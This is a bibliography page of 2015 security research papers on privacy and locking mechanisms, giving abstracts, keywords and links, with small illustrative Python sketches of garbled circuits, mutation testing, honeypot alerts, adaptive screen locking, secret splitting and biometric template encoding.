Abstract: We introduce TinyGarble, a novel automated methodology based on powerful logic synthesis techniques for generating and optimizing compressed Boolean circuits used in secure computation, such as Yao's Garbled Circuit (GC) protocol. TinyGarble achieves an unprecedented level of compactness and scalability by using a sequential circuit description for GC. We introduce new libraries and transformations, such that our sequential circuits can be optimized and securely evaluated by interfacing with available garbling frameworks. The circuit compactness makes the memory footprint of the garbling operation fit in the processor cache, resulting in fewer cache misses and thereby fewer CPU cycles. Our proof-of-concept implementation of benchmark functions using TinyGarble demonstrates a high degree of compactness and scalability. We improve the results of existing automated tools for GC generation by orders of magnitude; for example, TinyGarble can compress the memory footprint required for 1024-bit multiplication by a factor of 4,172, while decreasing the number of non-XOR gates by 67%. Moreover, with TinyGarble we are able to implement functions that have never been reported before, such as SHA-3. Finally, our sequential description enables us to design and realize a garbled processor, using the MIPS I instruction set, for private function evaluation. To the best of our knowledge, this is the first scalable emulation of a general purpose processor.

Keywords: logic circuits; logic design; TinyGarble methodology; Yao garbled circuit protocol; compactness degree; compressed Boolean circuits; general purpose processor; instruction set; logic synthesis techniques; private function evaluation; scalability degree; sequential description; sequential garbled circuits; Hardware design languages; Libraries; Logic gates; Optimization; Protocols; Sequential circuits; Wires; Garbled Circuit; Hardware Synthesis; Logic Design; Secure Function Evaluation (ID#: 16-9461)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163039&isnumber=7163005
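
A single garbled AND gate in the classic Yao style, just to fix ideas; TinyGarble's actual contribution (sequential circuit descriptions and logic-synthesis optimization) is far beyond this sketch. Each wire gets two random labels, each truth-table row encrypts the corresponding output label under the pair of input labels, and padding bytes let the evaluator recognize the one row it can decrypt.

```python
import hashlib
import random
import secrets

def H(a, b):
    # Hash of two wire labels, used as a one-time pad for one table row.
    return hashlib.sha256(a + b).digest()

def xor(x, y):
    return bytes(p ^ q for p, q in zip(x, y))

def garble_and():
    # Two random 16-byte labels per wire, encoding bit values 0 and 1.
    labels = {w: (secrets.token_bytes(16), secrets.token_bytes(16))
              for w in ("a", "b", "out")}
    table = []
    for va in (0, 1):
        for vb in (0, 1):
            out_label = labels["out"][va & vb]
            # Pad the output label so the evaluator can spot a valid row.
            table.append(xor(H(labels["a"][va], labels["b"][vb]),
                             out_label + b"\x00" * 16))
    random.shuffle(table)
    return labels, table

def evaluate(table, ka, kb):
    # Holding one label per input wire decrypts exactly one row.
    pad = H(ka, kb)
    for ct in table:
        pt = xor(pad, ct)
        if pt[16:] == b"\x00" * 16:
            return pt[:16]
    raise ValueError("no row decrypted")

labels, table = garble_and()
out = evaluate(table, labels["a"][1], labels["b"][1])
assert out == labels["out"][1]   # AND(1, 1) yields the 'one' output label
```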

 

A. Vasilateanu and A. Buga, "AsthMate -- Supporting Patient Empowerment through Location-Based Smartphone Applications," Control Systems and Computer Science (CSCS), 2015 20th International Conference on, Bucharest, 2015, pp. 411-417.  doi: 10.1109/CSCS.2015.61

Abstract: The ever-changing challenges and pressures on the healthcare domain have introduced the urgency of finding a replacement for traditional systems. Breakthroughs registered by information systems and advances in data storage and processing solutions, sustained by the ubiquity of gadgets and an efficient infrastructure for networks and services, have driven a shift of medical systems towards digital healthcare. The AsthMate application is an e-health tool for asthma patients, acting as an enabler for patient empowerment. The contributions brought by the application are both to the individual and to the community, exposing a web application that allows citizens to check the state of the air in the area they live in. The ongoing implementation can benefit from the advantages of cloud computing solutions in order to ensure better deployment and data accessibility. However, data privacy is a key aspect of such systems. For this reason, a proper trade-off between functionality, data openness and security should be reached.

Keywords: cloud computing; health care; smart phones; Asth Mate application; Web application; asthma patients; cloud computing solutions; data privacy; digital healthcare; e-health tool; information systems; location-based smartphone applications; patient empowerment; Biomedical monitoring; Cloud computing; Collaboration; Diseases; Monitoring; Prototypes; cloud computing; e-health; mobile computing; patient empowerment (ID#: 16-9462)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7168462&isnumber=7168393

 

S. Daoudagh, F. Lonetti and E. Marchetti, "Assessment of Access Control Systems Using Mutation Testing," TEchnical and LEgal aspects of data pRivacy and SEcurity, 2015 IEEE/ACM 1st International Workshop on, Florence, 2015, pp. 8-13. doi: 10.1109/TELERISE.2015.10

Abstract: In modern pervasive applications, it is important to validate access control mechanisms that are usually defined by means of the standard XACML language. Mutation analysis has been applied on access control policies for measuring the adequacy of a test suite. In this paper, we present a testing framework aimed at applying mutation analysis at the level of the Java based policy evaluation engine. A set of Java based mutation operators is selected and applied to the code of the Policy Decision Point (PDP). A first experiment shows the effectiveness of the proposed framework in assessing the fault detection of XACML test suites and confirms the efficacy of the application of code-based mutation operators to the PDP.

Keywords: Java; authorisation; program diagnostics; program testing; ubiquitous computing; Java based mutation operators; Java based policy evaluation engine; PDP; access control system assessment; code-based mutation operators; fault detection; mutation testing analysis; policy decision point code; standard XACML language; Access control; Engines; Fault detection; Java; Proposals; Sun; Testing (ID#: 16-9463)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7182463&isnumber=7182453
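
Mutation testing in miniature: apply a code-level mutation operator to a tiny policy decision point and check whether the test suite "kills" the mutant, i.e. some test now fails. The paper mutates a Java XACML PDP; this Python stand-in only illustrates how mutants measure test-suite adequacy.

```python
def pdp(request):
    # Original policy: permit only doctors performing a read.
    return request["role"] == "doctor" and request["action"] == "read"

def pdp_mutant(request):
    # Mutation operator applied: the action comparison negated to '!='.
    return request["role"] == "doctor" and request["action"] != "read"

TESTS = [
    ({"role": "doctor", "action": "read"}, True),
    ({"role": "nurse",  "action": "read"}, False),
]

def kills(mutant):
    # A mutant is killed if any test's outcome differs from the expectation.
    return any(mutant(req) != expected for req, expected in TESTS)

print(kills(pdp_mutant))   # True: this suite detects the mutant
```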

 

S. Sadki and H. E. Bakkali, "Towards Negotiable Privacy Policies in Mobile Healthcare," Innovative Computing Technology (INTECH), 2015 Fifth International Conference on, Galicia, 2015, pp. 94-99. doi: 10.1109/INTECH.2015.7173478

Abstract: With the increased use of mobile technologies in the health sector, patients are more and more concerned about their privacy protection. Particularly, due to the diversity of actors (physicians, healthcare organizations, Cloud providers...) and the heterogeneity of privacy policies defined by each actor, conflicts among these policies may occur. We believe that negotiation is one of the best techniques for resolving the issue of conflicting privacy policies. From this perspective, we present an approach and algorithm to negotiate privacy policies based on an extension of the bargaining model. Besides, in order to show how our solution can be applied, we present an example of conflicting privacy policies expressed using S4P, a generic language for specifying privacy preferences and policies.

Keywords: data privacy; medical information systems; mobile computing; S4P; bargaining model; generic language; health sector; mobile healthcare; mobile technologies; negotiable privacy policies; privacy policies; privacy preferences; privacy protection; Data privacy; Medical services; Mobile communication; Mobile handsets; Pragmatics; Privacy; Vocabulary; Mobile Healthcare; component; conflicting policies; policy negotiation; privacy; privacy policy language (ID#: 16-9464)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7173478&isnumber=7173359

 

E. B. Fernandez, N. Yoshioka and H. Washizaki, "Patterns for Security and Privacy in Cloud Ecosystems," Evolving Security and Privacy Requirements Engineering (ESPRE), 2015 IEEE 2nd Workshop on, Ottawa, ON, 2015, pp. 13-18. doi: 10.1109/ESPRE.2015.7330162

Abstract: An ecosystem is the expansion of a software product line architecture to include systems outside the product which interact with the product. We model here the architecture of a cloud-based ecosystem, showing security patterns for its main components. We discuss the value of this type of models.

Keywords: cloud computing; data privacy; security of data; software architecture; cloud ecosystems privacy; cloud ecosystems security; cloud-based ecosystem; security patterns; software product line architecture; Cloud computing; Computer architecture; Ecosystems; Security; Software as a service; Unified modeling language; Virtualization; Software ecosystems; cloud computing; reference architectures; security patterns; systems security (ID#: 16-9465)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7330162&isnumber=7330155

 

Shaun Shei, L. Marquez Alcaniz, H. Mouratidis, A. Delaney, D. G. Rosado and E. Fernandez-Medina, "Modelling Secure Cloud Systems Based on System Requirements," Evolving Security and Privacy Requirements Engineering (ESPRE), 2015 IEEE 2nd Workshop on, Ottawa, ON, 2015, pp. 19-24. doi: 10.1109/ESPRE.2015.7330163

Abstract: We enhance an existing security governance framework for migrating legacy systems to the cloud by holistically modelling the cloud infrastructure. To achieve this we demonstrate how components of the cloud infrastructure can be identified from existing security requirements models. We further extend the modelling language to capture cloud security requirements through a dual layered view of the cloud infrastructure, where the notions are supported through a running example.

Keywords: cloud computing; security of data; software maintenance; specification languages; cloud infrastructure; cloud security requirements; legacy systems; modelling language; secure cloud system modeling; security governance framework; security requirements models; system requirements; Aging; Analytical models; Cloud computing; Computational modeling; Guidelines; Physical layer; Security (ID#: 16-9466)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7330163&isnumber=7330155

 

K. Katkalov, K. Stenzel, M. Borek and W. Reif, "Modeling Information Flow Properties with UML," New Technologies, Mobility and Security (NTMS), 2015 7th International Conference on, Paris, 2015, pp. 1-5. doi: 10.1109/NTMS.2015.7266507

Abstract: Providing guarantees regarding the privacy of sensitive information in a distributed system consisting of mobile apps and services is a challenging task. Our IFlow approach allows the model-driven development of such systems, as well as the automatic generation of code and a formal model. In this paper, we introduce modeling guidelines for the design of intuitive, flexible and expressive information flow properties with UML. Further, we show how these properties can be guaranteed using a combination of automatic language-based information flow control and model-based interactive verification.

Keywords: codes; formal verification; mobile computing; telecommunication control; telecommunication services; IFlow approach; UML; Unified Modeling Language; automatic language; distributed system; information flow control; information flow properties; mobile apps; model-based interactive verification; sensitive information; Analytical models; Androids; Java; Mobile communication; Security; Unified modeling language; information flow; model-driven software development; privacy (ID#: 16-9467)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7266507&isnumber=7266450

 

H. Ulusoy, M. Kantarcioglu, B. Thuraisingham and L. Khan, "Honeypot Based Unauthorized Data Access Detection in MapReduce Systems," Intelligence and Security Informatics (ISI), 2015 IEEE International Conference on, Baltimore, MD, 2015, pp. 126-131. doi: 10.1109/ISI.2015.7165951

Abstract: The data processing capabilities of MapReduce systems, pioneered with the on-demand scalability of cloud computing, have enabled the Big Data revolution. However, data controllers/owners are worried about the privacy and accountability impact of storing their data in cloud infrastructures, as existing cloud computing solutions provide very limited control over the underlying systems. The intuitive approach - encrypting data before uploading to the cloud - is not applicable to MapReduce computation, as the data analytics tasks are defined ad hoc in the MapReduce environment using general programming languages (e.g., Java) and homomorphic encryption methods that can scale to big data do not exist. In this paper, we address the challenges of determining and detecting unauthorized access to data stored in MapReduce-based cloud environments. To this end, we introduce alarm-raising honeypots distributed over the data that are not accessed by the authorized MapReduce jobs, but only by attackers and/or unauthorized users. Our analysis shows that unauthorized data accesses can be detected with reasonable performance in MapReduce-based cloud environments.

Keywords: Big Data; cloud computing; cryptography; data analysis; data privacy; parallel processing; Big Data revolution; MapReduce systems; cloud computing; data analytics tasks; data encryption; data processing capabilities; general programming languages; homomorphic encryption methods; honeypot; on-demand scalability; privacy; unauthorized data access detection; Big data; Cloud computing; Computational modeling; Cryptography; Data models; Distributed databases (ID#: 16-9468)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7165951&isnumber=7165923
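
The honeypot idea reduced to its core: records that no authorized job should ever touch are seeded into the dataset, and any read of one raises an alert. The MapReduce integration and the paper's honeypot-placement analysis are not modeled; all names below are illustrative.

```python
import secrets

def seed_honeypots(records, n):
    # Insert n decoy records that legitimate jobs have no reason to read.
    honeypots = {f"hp-{secrets.token_hex(4)}": "decoy" for _ in range(n)}
    records.update(honeypots)
    return set(honeypots)

class AuditedStore:
    def __init__(self, records, honeypot_keys, alert):
        self._records, self._hp, self._alert = records, honeypot_keys, alert

    def read(self, key, user):
        if key in self._hp:
            self._alert(f"ALERT: {user} touched honeypot record {key}")
        return self._records.get(key)

records = {"r1": "real data", "r2": "more data"}
hp_keys = seed_honeypots(records, n=2)
store = AuditedStore(records, hp_keys, alert=print)
store.read("r1", user="job-42")                  # silent: legitimate read
store.read(next(iter(hp_keys)), user="mallory")  # prints an alert
```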

 

D. Gurov, P. Laud and R. Guanciale, "Privacy Preserving Business Process Matching," Privacy, Security and Trust (PST), 2015 13th Annual Conference on, Izmir, 2015, pp. 36-43. doi: 10.1109/PST.2015.7232952

Abstract: Business process matching is the activity of checking whether a given business process can interoperate with another one in a correct manner. In case the check fails, it is desirable to obtain information about how the first process can be corrected with as few modifications as possible to achieve interoperability. In case the two business processes belong to two separate enterprises that want to build a virtual enterprise, business process matching based on revealing the business processes poses a clear threat to privacy, as it may expose sensitive information about the inner operation of the enterprises. In this paper we propose a solution to this problem for business processes described by means of service automata. We propose a measure for similarity between service automata and use this measure to devise an algorithm that constructs the most similar automaton to the first one that can interoperate with the second one. To achieve privacy, we implement this algorithm in the programming language SecreC, executing on the Sharemind platform for secure multiparty computation. As a result, only the correction information is leaked to the first enterprise and no more.

Keywords: automata theory; business process re-engineering; data privacy; open systems; security of data; virtual enterprises; SecreC; Sharemind platform; business process matching; information privacy; interoperability; programming language; secure multiparty computation; service automata; virtual enterprise; Automata; Business; Collaboration; Guidelines; Privacy; System recovery; Weight measurement (ID#: 16-9469)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7232952&isnumber=7232940

 

J. Caramujo and A. M. Rodrigues Da Silva, "Analyzing Privacy Policies Based on a Privacy-Aware Profile: The Facebook and LinkedIn Case Studies," Business Informatics (CBI), 2015 IEEE 17th Conference on, Lisbon, 2015, pp. 77-84. doi: 10.1109/CBI.2015.44

Abstract: The regular use of social networking websites and applications encompasses the collection and retention of personal and often very sensitive information about users. This information needs to remain private, and each social network maintains a privacy policy that describes in depth how users' information is managed and disclosed. Problems arise when the development of new systems and applications includes integration with social networks. The lack of clear understanding and of a precise mechanism to enforce the statements described in privacy policies can compromise the development and adaptation of these statements. This paper proposes the extension and validation of a UML profile for privacy-aware systems. The goal of this approach is to provide a better understanding of the different privacy-related requirements for improving privacy policy enforcement when developing systems or applications integrated with social networks. Additionally, to illustrate the potential of this profile, the paper presents and discusses its application to two real-world case studies - the Facebook and LinkedIn policies - which are well structured and represented through two respective Excel files.

Keywords: Unified Modeling Language; computer network security; data privacy; information management; social networking (online);Excel file; Facebook; LinkedIn; UML profile; privacy aware profile; privacy aware system; privacy profile analysis; social networking Websites; user information management; Business; Conferences; Informatics; Facebook; LinkedIn; Privacy; Requirements; System; UML profile; integration (ID#: 16-9470)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7264718&isnumber=7264698

 


 

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Locking 2015

 

 
SoS Logo

Locking 2015

 

In computer science, a lock is a synchronization mechanism designed to enforce a mutual-exclusion policy on access to a shared resource. Locks have some advantages and many disadvantages; to be efficient, they typically require hardware support. For the Science of Security community, locking is relevant to policy-based governance, resilience, cyber physical systems, and composability. This research was presented in 2015.


I. Singh, K. Mishra, A. M. Alberti, A. Jara and D. Singh, "A Novel Privacy and Security Framework for the Cloud Network Services," Advanced Communication Technology (ICACT), 2015 17th International Conference on, Seoul, 2015, pp. 363-367. doi: 10.1109/ICACT.2015.7224820

Abstract: This paper presents an overview of security and its issues in cloud computing. Nowadays, cloud computing is used extensively in fields such as financial management, communications and collaboration, office productivity suites, accounting applications, customer relationship management, online storage management, and human resources and employment. Owing to the increase in companies' use of these services, several security issues have emerged, and this challenges cloud computing architectures to secure, protect and process users' data. These services have certain drawbacks, such as security, lock-in, lack of control, and reliability. Privacy and security are the major concerns in cloud computing services. In this paper, we have designed a novel secure framework for cloud services, as well as presented a critical analysis of the CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) protocol for secure data management of cloud services.

Keywords: cloud computing; computer network security; cryptographic protocols; data privacy; CCMP protocol; cloud computing; cloud network services; counter with cipher block message authentication code protocol; privacy framework; secure data management; security framework; Cloud computing; Encryption; Payloads; Radiation detectors; Servers; CCMP; Cloud Computing; Security; Services (ID#: 16-9471)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7224820&isnumber=7224736

 

I. Singh, K. N. Mishra, A. Alberti, D. Singh and A. Jara, "A Novel Privacy and Security Framework for the Cloud Network Services," Innovative Mobile and Internet Services in Ubiquitous Computing (IMIS), 2015 9th International Conference on, Blumenau, 2015, pp. 301-305. doi: 10.1109/IMIS.2015.93

Abstract: This paper presents an overview of security and its issues in cloud computing. Nowadays, cloud computing is used extensively in fields such as financial management, communications and collaboration, office productivity suites, accounting applications, customer relationship management, online storage management, and human resources and employment. Owing to the increase in companies' use of these services, several security issues have emerged, and this challenges cloud computing architectures to secure, protect and process users' data. These services have certain drawbacks, such as security, lock-in, lack of control, and reliability. Privacy and security are the major concerns in cloud computing services. In this paper, we have designed a novel secure framework for cloud services, as well as presented a critical analysis of the CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) protocol for secure data management of cloud services.

Keywords: cloud computing; computer network reliability; computer network security; cryptographic protocols; data privacy; message authentication; software architecture; CCMP Protocol; accounting applications; cloud computing architectures; cloud network services; communications-and-collaboration; counter-with-cipher block message authentication code protocol; customer relationship management; employment; financial management; human resource; office productivity suits; online storage management; privacy framework; secure data management; security framework; user data processing; user data protection; Cloud computing; Encryption; Payloads; Radiation detectors; Servers; CCMP; Cloud Computing; Security; Services (ID#: 16-9472)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7284965&isnumber=7284886

 

Seongyeol Oh, Joon-Sung Yang, A. Bianchi and Hyoungshick Kim, "Devil in a Box: Installing Backdoors in Electronic Door Locks," Privacy, Security and Trust (PST), 2015 13th Annual Conference on, Izmir, 2015, pp. 139-144. doi: 10.1109/PST.2015.7232965

Abstract: Electronic door locks must be carefully designed to allow valid users to open (or close) a door and prevent unauthorized people from opening (or closing) the door. However, lock manufacturers have often ignored the fact that door locks can be modified by attackers in the real world. In this paper, we demonstrate that the most popular electronic door locks can easily be compromised by inserting a malicious hardware backdoor to perform unauthorized operations on the door locks. Attackers can replay a valid DC voltage pulse to open (or close) the door in an unauthorized manner or capture the user's personal identification number (PIN) used for the door lock.

Keywords: electronic engineering computing; electronic products; keys (locking); security of data; DC voltage pulse; PIN; backdoors installation; electronic door locks; lock manufacturers; malicious hardware backdoor; personal identification number; Batteries; Bluetooth; Central Processing Unit; Consumer electronics; Solenoids; Voltage measurement; Wires (ID#: 16-9473)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7232965&isnumber=7232940

 

N. W. Lo, C. K. Yu and C. Y. Hsu, "Intelligent Display Auto-Lock Scheme for Mobile Devices," Information Security (AsiaJCIS), 2015 10th Asia Joint Conference on, Kaohsiung, 2015, pp. 48-54. doi: 10.1109/AsiaJCIS.2015.30

Abstract: In recent years, people in modern societies have come to rely heavily on their own intelligent mobile devices, such as smartphones and tablets, to obtain personal services and improve work efficiency. Consequently, these smart handheld devices generally adopt quick and simple authentication mechanisms, such as screen auto-lock schemes, along with energy-saving considerations. When a smart device activates its screen lock mode to protect user privacy and data security, its screen auto-lock scheme is executed at the same time. The device user can set the length of the idle period that activates the screen lock mode. However, a short time-period setting causes inconvenience for device users when invoking screen auto-lock. How to balance security and convenience for individual users of their own smart devices has become an interesting issue. In this paper, an intelligent display (screen) auto-lock scheme is proposed for mobile users. It can dynamically adjust the unlock time-period setting of an auto-lock scheme based on knowledge derived from past user behaviors.

Keywords: authorisation; data protection; display devices; human factors; mobile computing; smart phones; authentication mechanisms; data security; energy saving; intelligent display auto-lock scheme; intelligent mobile devices; mobile users; personal services; screen auto-lock schemes; smart handheld devices; smart phones; tablets; unlock time period; user behaviors; user convenience; user privacy protection; user security; work efficiency improvement; Authentication; IEEE 802.11 Standards; Mathematical model; Smart phones; Time-frequency analysis; Android platform; display auto-lock; smartphone (ID#: 16-9474)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7153935&isnumber=7153836
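
A toy version of the adaptive idea: keep an exponential moving average of how long the user actually stays active after unlocking, and derive the auto-lock timeout from it, clamped to a safe range. The paper derives its setting from richer behavioral knowledge; the constants here are assumptions.

```python
class AdaptiveAutoLock:
    def __init__(self, initial=30.0, alpha=0.3, lo=10.0, hi=300.0):
        # lo/hi clamp keeps the timeout within a safe, usable range.
        self.timeout, self.alpha, self.lo, self.hi = initial, alpha, lo, hi

    def record_session(self, active_seconds):
        # Blend the newest observation into the running estimate (EMA).
        est = (1 - self.alpha) * self.timeout + self.alpha * active_seconds
        self.timeout = min(self.hi, max(self.lo, est))

lock = AdaptiveAutoLock()
for session in [45, 50, 220, 15]:
    lock.record_session(session)
print(round(lock.timeout, 1))   # the timeout now tracks observed behavior
```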

 

S. Sengupta, K. M. Annervaz, A. Saxena and S. Paul, "Data Vaporizer - Towards a Configurable Enterprise Data Storage Framework in Public Cloud," Cloud Computing (CLOUD), 2015 IEEE 8th International Conference on, New York City, NY, 2015, pp. 73-80. doi: 10.1109/CLOUD.2015.20

Abstract: We propose a novel cloud-based data storage solution framework named Data Vaporizer (DV). The proposed framework provides many unique features such as storing data over multiple clouds or storage zones, resistance against organized vendor attacks, maintaining data integrity and confidentiality through client-side processing, fault-tolerance against failure of one or more cloud storage locations and avoids vendor lock-in of data. Data Vaporizer is highly configurable to meet various client data encryption requirements, compliance to industry standards and fault tolerance constraints depending on the nature and sensitivity of the data. To enhance the level of security and reliability, especially to protect data against malicious attacks and secure key management in cloud, DV uses advanced techniques of secret sharing of the keys. The architecture and optimality of data placement and efficient key management algorithm of DV ensure that the solution is highly scalable. The data foot print and subsequent cost incurred by our storage solution is minimal, considering the benefits provided. The initial response for the adoption of DV in actual client scenarios is promising.

Keywords: cloud computing; data integrity; security of data; storage management; client data encryption; cloud storage; confidentiality through client-side processing; configurable enterprise data storage framework; data integrity; data vaporizer; key management algorithm; keys secret sharing; public cloud; resistance against organized vendor attacks; storage zones; Cloud computing; Encoding; Encryption; Fault tolerance; Fault tolerant systems; Industries; cloud storage; data archival; enterprise data; fault-tolerance; integrity; optimal storage; privacy; secret key sharing; secure multi-party computation (ID#: 16-9475)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7214030&isnumber=7212169
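
An n-of-n XOR split as a minimal stand-in for the multi-cloud dispersal idea: each provider stores one random-looking share, and only all shares together reveal the data. Data Vaporizer itself layers encryption, fault tolerance, and threshold key sharing on top, none of which is shown; note that a plain XOR split, unlike the real system, tolerates no share loss.

```python
import secrets

def vaporize(data: bytes, n: int):
    # n-1 random shares plus one share that XORs back to the data.
    shares = [secrets.token_bytes(len(data)) for _ in range(n - 1)]
    last = data
    for s in shares:
        last = bytes(a ^ b for a, b in zip(last, s))
    return shares + [last]          # one share per cloud provider

def condense(shares):
    out = shares[0]
    for s in shares[1:]:
        out = bytes(a ^ b for a, b in zip(out, s))
    return out

shares = vaporize(b"enterprise record", n=3)
assert condense(shares) == b"enterprise record"
```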

 

S. R. Bandre, "Design and Implementation of Smartphone Authentication System Based on Color-Code," Pervasive Computing (ICPC), 2015 International Conference on, Pune, 2015, pp. 1-5. doi: 10.1109/PERVASIVE.2015.7087038

Abstract: Smartphones are used as a communication channel for exchanging user data and coordinating business work. Users are concerned about the private data stored on their portable devices, but unfortunately these devices are prone to attacks by malicious users. The objective of this paper is to provide a new authentication system based on a Color-Code such that it preserves users' privacy and improves smartphone security. Every individual has his or her own preference when selecting colors. A color sequence can be one of a very large number of unique color combinations, and such sequences are easy to remember. A user specifies a desired Color-Code sequence as a passkey to authenticate on the device. To fortify smartphone security against malicious users, this system uses random colors to increase the difficulty of brute-force attacks. The system is based on a multi-phase security schema which authenticates users and safeguards their privacy on a smartphone.

Keywords: data privacy; mobile computing; smart phones; authenticate user; authentication system; brute force attack; business work; color code sequence; color sequence; communication channel; exchanging user data; malicious user attack; malicious users; multiphase security schema; portable devices; private data; smartphone authentication system; smartphone security; Authentication; Bipartite graph; Color; Graphical user interfaces; Image color analysis; Privacy; Authentication; Color-code; Lock-screen; Mobile Device; Smartphone (ID#: 16-9476)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7087038&isnumber=7086957

 

A. Tashkandi and I. Al-Jabri, "Cloud Computing Adoption by Higher Education Institutions in Saudi Arabia: Analysis Based on TOE," Cloud Computing (ICCC), 2015 International Conference on, Riyadh, 2015, pp. 1-8. doi: 10.1109/CLOUDCOMP.2015.7149634

Abstract: (1) Background, Motivation and Objective: Academic study of cloud computing within Saudi Arabia is an emerging research field. Saudi Arabia represents the largest economy in the Arabian Gulf region, which positions it as a potential market for cloud computing technologies. Adoption of new innovations should be preceded by analysis of the added value, challenges and adequacy from technological, organizational and environmental perspectives. (2) Statement of Contribution/Method: This cross-sectional exploratory empirical research is based on the Technology, Organization and Environment model, targeting higher education institutions. In this study, the factors that influence adoption by higher education institutions were analyzed and tested using Partial Least Squares. (3) Results, Discussion and Conclusions: Three factors were found significant in this context: Relative Advantage, Data Privacy and Complexity are the most significant. The model explained 43% of the total variation in the adoption measure. Significant differences between large and small institutions were revealed in the areas of cloud computing compatibility, complexity, vendor lock-in and peer pressure. Items for future cloud computing research were explored through open-ended questions. Adoption of cloud services by higher education institutions has started, and the adoption rate among large universities is higher than among small higher education institutions. Improving the network and Internet infrastructure in Saudi Arabia at an affordable cost is a prerequisite for cloud computing adoption. Cloud service providers should address the privacy and complexity concerns raised by non-adopters. Future information systems that are candidates for hosting in the cloud were prioritized.

Keywords: cloud computing; computer aided instruction; data privacy; educational institutions; further education; Arabian Gulf region; Internet infrastructure; Saudi Arabia; TOE model; cloud computing; data privacy; higher education institutions; partial least square; technology, organization and environment model; universities; Cloud computing; Complexity theory; Computational modeling; Context; Education; Organizations; Technological innovation (ID#: 16-9477)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7149634&isnumber=7149613 

 

C. Rathgeb, J. Wagner, B. Tams and C. Busch, "Preventing the Cross-Matching Attack in Bloom Filter-Based Cancelable Biometrics," Biometrics and Forensics (IWBF), 2015 International Workshop on, Gjovik, 2015, pp. 1-6. doi: 10.1109/IWBF.2015.7110226

Abstract: Deployments of biometric technologies are already widely disseminated, so the protection of biometric reference data becomes vital in order to safeguard individuals' privacy. Biometric template protection techniques are designed to protect biometric templates in an irreversible and unlinkable manner (ISO/IEC IS 24745). In addition, these schemes are required to maintain key system properties, e.g. biometric performance or authentication speed. Recently, template protection schemes based on Bloom filters have been introduced and applied to various biometric characteristics, such as iris or face. While a Bloom filter-based representation of biometric templates is irreversible, the originally proposed system has been shown to be vulnerable to cross-matching attacks. In this paper we address this issue and demonstrate that any kind of Bloom filter-based representation of biometric templates can be transformed into an unordered set of integer values, which enables a locking of irreversible templates in the fuzzy vault scheme of Dodis et al. that can be secured against known cross-matching attacks. In addition, experiments carried out on a publicly available iris database show that the proposed scheme retains the biometric performance of the original system.

Keywords: data protection; data structures; fuzzy set theory; iris recognition; Bloom filter-based biometric template representation; Bloom filter-based cancelable biometrics; biometric reference data protection; biometric template protection techniques; cross-matching attack; fuzzy vault scheme; iris database; Feature extraction; Indexes;Iris recognition; Security; Bloom filter; Template protection; cross-matching; fuzzy vault; iris biometrics (ID#: 16-9478)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7110226&isnumber=7110217
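
As a rough illustration of the transformation step the abstract claims, a Bloom filter-based template (a sequence of fixed-size bit blocks) can be mapped to an unordered set of integers by packing each block's bits into a word tagged with the block index; the resulting set is the kind of input a fuzzy vault locks. The encoding below is illustrative only; the paper's exact construction is not reproduced here.

```python
# Hedged sketch: turning a Bloom filter-based template (a sequence of
# fixed-size bit blocks) into an unordered set of integers suitable for
# locking in a fuzzy vault. The packing scheme is illustrative, not the
# encoding used by Rathgeb et al.

def blocks_to_feature_set(blocks: list[list[int]]) -> set[int]:
    """Encode each Bloom filter block as one integer tagged with its block index."""
    features = set()
    for idx, bits in enumerate(blocks):
        word = 0
        for bit in bits:          # pack the block's bits into an integer
            word = (word << 1) | bit
        # Prefix with the block index so identical blocks in different
        # positions map to distinct set elements.
        features.add((idx << len(bits)) | word)
    return features

template = [[1, 0, 1, 1], [0, 0, 1, 0], [1, 1, 0, 0]]   # toy 3-block filter
print(blocks_to_feature_set(template))   # unordered set: order-invariant vault input
```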

 

M. Tanwar, R. Duggal and S. K. Khatri, "Unravelling Unstructured Data: A Wealth of Information in Big Data," Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015 4th International Conference on, Noida, 2015, pp. 1-6. doi: 10.1109/ICRITO.2015.7359270

Abstract: Big Data is data of high volume and high variety being produced or generated at high velocity, which cannot be stored, managed, processed or analyzed using existing traditional software tools, techniques and architectures. Big data brings challenges such as scale, heterogeneity, speed and privacy, but there are opportunities as well. Potential information is locked in big data which, if properly leveraged, will make a huge difference to business. With the help of big data analytics, meaningful insights can be extracted from big data, which is heterogeneous in nature, comprising structured, unstructured and semi-structured content. One prime challenge in big data analytics is that nearly 95% of the data is unstructured. This paper describes what big data and big data analytics are. A review of different techniques and approaches to analyzing unstructured data is given. The paper emphasizes the importance of analyzing unstructured data along with structured data in business to extract holistic insights, and highlights the need for appropriate and efficient analytical methods for knowledge discovery from huge volumes of heterogeneous data in unstructured formats.

Keywords: Big Data; data mining; software architecture; software tools; text analysis; Big Data analytics; heterogeneous data; knowledge discovery; semistructured content; software architectures; software techniques; software tools; unstructured data analysis; Audio Analytics; Big Data; Social Media Analytics; Text Analytics; Unstructured data; Video Analytics (ID#: 16-9479)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7359270&isnumber=7359191

 

